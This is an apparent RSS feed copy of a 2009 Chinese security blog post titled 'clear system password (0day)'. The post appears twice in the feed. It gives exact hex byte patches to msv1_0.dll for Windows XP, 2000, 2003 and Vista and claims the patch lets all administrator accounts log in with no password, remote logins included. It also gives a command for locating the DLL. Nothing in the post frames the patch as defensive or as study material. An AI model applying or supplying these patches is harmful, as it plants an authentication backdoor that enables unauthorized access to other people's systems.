Chinadu's Blog » 系统 http://www.4shell.org 关注网络安全 Fri, 10 Feb 2012 03:53:40 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 清空系统密码(0day) http://www.4shell.org/archives/816.html http://www.4shell.org/archives/816.html#comments Fri, 26 Jun 2009 08:31:50 +0000 Chinadu http://202.172.32.240/~shellorg/archives/816.html
这东西再放都长毛了,放出来....精灵还写了个利用工具,找不到了.回头补上..

ystem32下 有个msv1_0.dll

xp sp2
F8 10 75 11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D

2k professinal
F8 10 0F 84 71 FF FF
修改为
E0 00 0F 84 71 FF FF

2k sp4
F8 10 75 11 b0 01 8b 4D
修改为
E0 00 75 11 b0 01 8b 4D
... ]]> 来源:7jdg's blog

这东西再放都长毛了,放出来....精灵还写了个利用工具,找不到了.回头补上..

ystem32下 有个msv1_0.dll

xp sp2
F8 10 75 11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D

2k professinal
F8 10 0F 84 71 FF FF
修改为
E0 00 0F 84 71 FF FF

2k sp4
F8 10 75 11 b0 01 8b 4D
修改为
E0 00 75 11 b0 01 8b 4D

2003 sp1
F8 10 0F 84 D0 B8 FF FF
修改为
E0 00 0F 84 D0 B8 FF FF

vista rtm
F8 10 75 13 B0 01 8B 4D
修改为
E0 00 75 13 B0 01 8B 4D

都是前两个字节改为
E0 00

全部管理员帐号无须密码登陆
包括远程登陆的

改两个目录的 msv1_0.dll 用16进制
dir /s c:\windows\msv1_0.dll

随机日志

]]> http://www.4shell.org/archives/816.html/feed 0